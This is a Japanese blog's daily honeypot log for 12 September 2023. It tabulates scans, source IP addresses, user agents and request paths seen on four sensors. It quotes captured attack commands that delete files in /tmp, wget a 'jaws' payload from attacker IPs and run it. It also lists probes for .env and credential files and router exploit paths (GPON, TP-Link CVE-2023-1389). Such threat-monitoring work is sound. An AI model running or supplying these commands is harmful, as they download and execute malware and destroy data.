コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/09/12 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2023/09/12分です。

特徴
共通

zgrabによるスキャン行為
/.envへのスキャン行為
WordPressへのスキャン行為

Location:JP

.jsへのスキャン行為
CensysInspectによるスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  5.253.246.16/jaws;
sh /tmp/jaws
Location:US

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 185.224.128.151/jaws;
sh /tmp/jaws
Location:UK

GPONルータの脆弱性を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 94.158.247.123/jaws;
sh /tmp/jaws
Location:SG

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

アクセス数推移

JP:総アクセス数:216 (前日比:116)
US:総アクセス数:88 (前日比:-127)
UK:総アクセス数:88 (前日比:-29)
SG:総アクセス数:130 (前日比:33)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
45 18.144.84.183 United States
71 20.59.63.204 United States
1 20.245.112.35 United States
2 34.88.193.244 United States
1 36.106.167.174 China
17 44.212.92.233 United States
1 45.8.22.14 Spain
1 45.33.80.243 United States
1 45.55.0.43 United States
1 45.56.108.128 United States
1 45.79.181.223 United States
1 45.79.181.251 United States
1 47.88.101.3 United States
1 47.89.193.239 United States
1 59.52.179.128 China
1 64.62.197.143 United States
1 64.62.197.151 United States
1 65.49.20.66 United States
1 85.208.114.140 Cyprus
1 104.192.0.50 United States
2 109.237.98.226 Russia
14 135.125.217.54 France
1 135.125.244.48 France
4 152.32.226.155 Hong Kong
1 162.142.125.217 United States
1 162.243.129.39 United States
1 167.248.133.36 United States
2 172.245.45.206 United States
1 178.62.18.203 United States
4 185.142.236.43 Seychelles
4 185.254.196.173 Ukraine
1 185.254.196.186 Ukraine
16 186.155.227.234 Colombia
1 192.241.217.37 United States
4 198.20.87.98 United States
1 198.235.24.17 United States
1 200.114.65.58 Chile
1 205.210.31.110 United States
4 207.90.244.6 United States
1 220.173.208.204 China

UserAgent一覧

件数 UserAgent
73 -
1 Go-http-client/1.1
1 Mozilla/4.8 [en] (Windows NT 5.1; U)
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
86 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
37 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 zgrab/0.x
1 python-requests/2.28.1
1 python-requests/2.31.0

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_18.179.20.5_80\n
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\t\x01
1 \x16\x03\x01\x01\xfa\x01
4 \x16\x03\x01\x02
9 \x16\x03\x01
1 GET /.env.backup HTTP/1.1
1 GET /.env.development HTTP/1.1
1 GET /.env.dist HTTP/1.1
1 GET /.env.local HTTP/1.1
1 GET /.env.old HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production HTTP/1.1
1 GET /.env.project HTTP/1.1
2 GET /.env.save HTTP/1.1
27 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /.json HTTP/1.1
3 GET /.well-known/security.txt HTTP/1.1
1 GET /?phpinfo=1 HTTP/1.1
1 GET /API/.env HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /admin/phpinfo.php HTTP/1.1
2 GET /api/.env HTTP/1.1
2 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /bedesk1.1/.env HTTP/1.1
1 GET /blog/.env HTTP/1.1
1 GET /cms/.env HTTP/1.1
1 GET /config.json HTTP/1.1
2 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /dashboard/phpinfo.php HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /dev/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /env/.env HTTP/1.1
1 GET /enviroments/.env.production HTTP/1.1
1 GET /enviroments/.env HTTP/1.1
8 GET /favicon.ico HTTP/1.1
1 GET /fedex/.env HTTP/1.1
2 GET /frontend_dev.php/$ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /live_env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /php-info HTTP/1.1
1 GET /php.ini HTTP/1.1
2 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo/phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
4 GET /robots.txt HTTP/1.1
1 GET /script/.env HTTP/1.1
1 GET /shared/.env HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 5.253.246.16/jaws;sh+/tmp/jaws
4 GET /sitemap.xml HTTP/1.1
1 GET /sources/.env HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /temp.php HTTP/1.1
1 GET /test/bedesk1.1/.env HTTP/1.1
1 GET /v3/time HTTP/1.1
1 GET /wp-config.php-backup HTTP/1.1
1 GET http[:]//18[.]179[.]20[.]5:80/MyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/SQL/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/_phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysql-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/php-myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/php/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpmy-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/sqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/sqlweb/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/webadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/webdb/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/websql/scripts/setup.php HTTP/1.0
1 OPTIONS / HTTP/1.0
1 POST /.env.development HTTP/1.1
1 POST /.env.dist HTTP/1.1
1 POST /.env.old HTTP/1.1
1 POST /.env.prod HTTP/1.1
1 POST /.env.production HTTP/1.1
1 POST /.env.project HTTP/1.1
1 POST /.env.save HTTP/1.1
1 POST /.env HTTP/1.1
1 POST /admin-app/.env HTTP/1.1
1 POST /api/.env HTTP/1.1
1 POST /app/.env HTTP/1.1
1 POST /application/.env HTTP/1.1
1 POST /apps/.env HTTP/1.1
1 POST /back/.env HTTP/1.1
1 POST /cms/.env HTTP/1.1
1 POST /core/.env HTTP/1.1
1 POST /cp/.env HTTP/1.1
1 POST /development/.env HTTP/1.1
1 POST /docker/.env HTTP/1.1
1 POST /enviroments/.env.production HTTP/1.1
1 POST /enviroments/.env HTTP/1.1
1 POST /fedex/.env HTTP/1.1
1 POST /laravel/.env HTTP/1.1
1 POST /live_env HTTP/1.1
1 POST /local/.env HTTP/1.1
1 POST /private/.env HTTP/1.1
1 POST /rest/.env HTTP/1.1
1 POST /script/.env HTTP/1.1
1 POST /shared/.env HTTP/1.1
1 POST /sources/.env HTTP/1.1
1 POST /system/.env HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.123.9.148 United States
2 24.199.98.33 United States
2 34.116.120.86 United States
2 45.79.128.205 United States
1 45.79.172.21 United States
1 45.79.181.94 United States
1 45.79.181.223 United States
1 45.128.232.137 Bulgaria
8 51.79.29.48 Canada
13 54.36.115.221 France
7 54.37.79.75 France
1 64.62.197.184 United States
1 64.62.197.185 United States
1 65.49.20.69 United States
1 77.90.185.152 Germany
2 83.97.73.87 Germany
1 89.185.31.9 Ukraine
1 103.115.185.94 Pakistan
1 111.7.96.171 China
1 111.33.20.64 China
1 112.160.164.254 South Korea
1 134.209.191.182 United States
2 139.59.37.187 Singapore
1 143.42.31.89 United States
2 143.110.182.33 United States
1 157.245.144.50 United States
1 159.203.208.9 United States
2 162.142.125.11 United States
2 162.142.125.221 United States
2 162.142.125.224 United States
2 167.94.145.52 United States
2 167.94.145.53 United States
2 167.248.133.35 United States
1 171.34.178.249 China
1 172.104.11.4 United States
2 172.104.11.51 United States
2 172.105.128.11 United States
1 179.43.191.194 Panama
1 179.60.147.13 Belize
1 182.138.158.210 China
1 183.136.225.32 China
1 185.174.136.76 Seychelles
2 192.155.90.118 United States
1 194.165.16.72 Panama
1 198.235.24.5 United States
1 205.210.31.79 United States
1 205.210.31.207 United States
1 223.166.22.181 China

UserAgent一覧

件数 UserAgent
28 -
1 Go-http-client/1.1
1 Hello, world
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0
4 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
30 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
6 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5
7 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0

リクエスト内容一覧

件数 Method Request Protocol
2 \x03
1 \x16\x03\x01\x01\xfb\x01
17 \x16\x03\x01
30 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
3 GET /aaa9 HTTP/1.1
3 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
2 GET /cdn-cgi/trace HTTP/1.1
13 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+185[.]224[.]128[.]151/jaws;sh+/tmp/jaws HTTP/1.1
1 HEAD /.env HTTP/1.1
1 OPTIONS / HTTP/1.0
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /xmlrpc.php HTTP/1.1\n
6 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
2 34.105.235.72 United States
8 38.242.222.177 United States
1 45.79.172.21 United States
1 45.79.181.223 United States
1 45.79.181.251 United States
1 46.101.72.156 United States
1 47.88.86.63 United States
1 47.251.13.32 United States
4 51.79.29.48 Canada
11 54.36.115.221 France
1 54.37.79.75 France
1 60.13.7.94 China
1 62.122.184.215 Russia
1 64.62.197.109 United States
2 64.227.41.39 United States
2 64.227.146.243 United States
2 66.175.213.4 United States
2 77.90.185.152 Germany
1 107.170.237.54 United States
1 107.170.238.50 United States
2 122.252.235.118 India
1 138.68.81.206 United States
2 146.190.111.237 United States
1 157.230.99.133 United States
1 157.245.144.50 United States
1 162.243.136.71 United States
3 167.99.129.80 United States
13 170.64.182.2 United States
1 171.25.222.7 Czechia
1 171.116.44.238 China
1 171.116.202.53 China
1 172.104.11.4 United States
1 172.104.11.51 United States
2 172.105.128.11 United States
2 172.105.128.13 United States
1 173.244.62.7 United States
1 179.60.147.13 Belize
2 184.105.247.252 United States
1 192.99.9.171 Canada
1 192.155.90.220 United States
1 198.235.24.33 United States
1 205.210.31.86 United States
2 209.97.161.132 United States

UserAgent一覧

件数 UserAgent
30 -
5 FooBarTest
1 Hello, World
1 Hello, world
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
8 Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
16 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
6 Mozilla/5.0 zgrab/0.x
5 Mozilla/5.0
1 curl/8.1.2

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_132.145.66.34_80\n
2 \x03
2 \x16\x03\x01\x01\x07\x01
1 \x16\x03\x01\x01\xfc\x01
19 \x16\x03\x01
17 GET /.env HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
2 GET /aaa9 HTTP/1.1
2 GET /aab8 HTTP/1.1
1 GET /backup/ HTTP/1.1
1 GET /blog/ HTTP/1.1
1 GET /bundle.js HTTP/1.1
4 GET /cdn-cgi/trace HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /new/ HTTP/1.1
1 GET /old/ HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+94[.]158[.]247[.]123/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /temp/ HTTP/1.1
1 GET /test/ HTTP/1.1
1 GET /upl.php HTTP/1.1
1 GET /wordpress/ HTTP/1.1
1 GET /wp/ HTTP/1.1
5 GET http[:]//test[.]getproxylist[.]com/ HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
2 POST /xmlrpc.php HTTP/1.1\n
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
2 4.151.175.100 United States
45 13.127.115.30 United States
1 20.55.53.144 United States
2 34.94.213.58 United States
1 45.56.108.128 United States
1 45.79.128.205 United States
1 45.79.181.94 United States
1 45.79.181.179 United States
1 45.79.181.251 United States
1 46.19.139.138 Panama
1 46.101.75.216 United States
7 51.79.29.48 Canada
4 54.36.115.221 France
1 54.37.79.75 France
1 62.122.184.215 Russia
1 64.62.197.100 United States
2 66.175.213.4 United States
1 68.218.80.72 United States
1 77.90.185.152 Germany
2 83.97.73.87 Germany
1 85.208.114.140 Cyprus
1 89.248.163.96 United Kingdom
4 103.83.144.161 India
1 103.168.241.54 India
1 103.206.115.91 India
2 109.237.98.53 Russia
1 120.79.218.254 China
1 123.158.51.221 China
1 123.245.24.74 China
2 134.122.30.157 United States
2 138.68.153.47 United States
1 139.59.12.179 Singapore
2 162.142.125.221 United States
2 162.142.125.225 United States
1 162.243.136.62 United States
1 162.243.146.4 United States
14 164.52.36.213 China
1 172.104.11.46 United States
1 172.105.128.12 United States
1 172.105.128.13 United States
1 179.43.191.194 Panama
1 179.60.147.13 Belize
2 184.105.247.252 United States
1 192.155.90.118 United States
1 192.155.90.220 United States
1 192.241.238.39 United States
1 194.165.16.37 Panama
1 198.235.24.17 United States
1 198.235.24.202 United States
1 212.192.14.94 Czechia
1 217.138.192.126 United Kingdom

UserAgent一覧

件数 UserAgent
89 -
1 Go-http-client/1.1
1 Hello, World
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
13 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070530 Fedora/2.0.0.4-1.fc7 Firefox/2.0.0.4
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
6 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 MGLNDD_13.67.44.234_80
4 \x03
1 \x16\x03\x01\x01\xfb\x01
3 \x16\x03\x01\x01 \x01
24 \x16\x03\x01
1 GET /+CSCOE+/logon.html?fcadbadd=1 HTTP/1.1
14 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /aaa9 HTTP/1.1
2 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /application/config/email.php HTTP/1.1
1 GET /config.php HTTP/1.1
1 GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /swagger HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/MyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/SQL/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/_phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/admin/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/admin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/db/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/dbadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/mysql-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/mysql/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/mysqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/mysqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/php-myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/php/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin3/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpma/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpmanager/scripts/setup.php HTTP/1.0
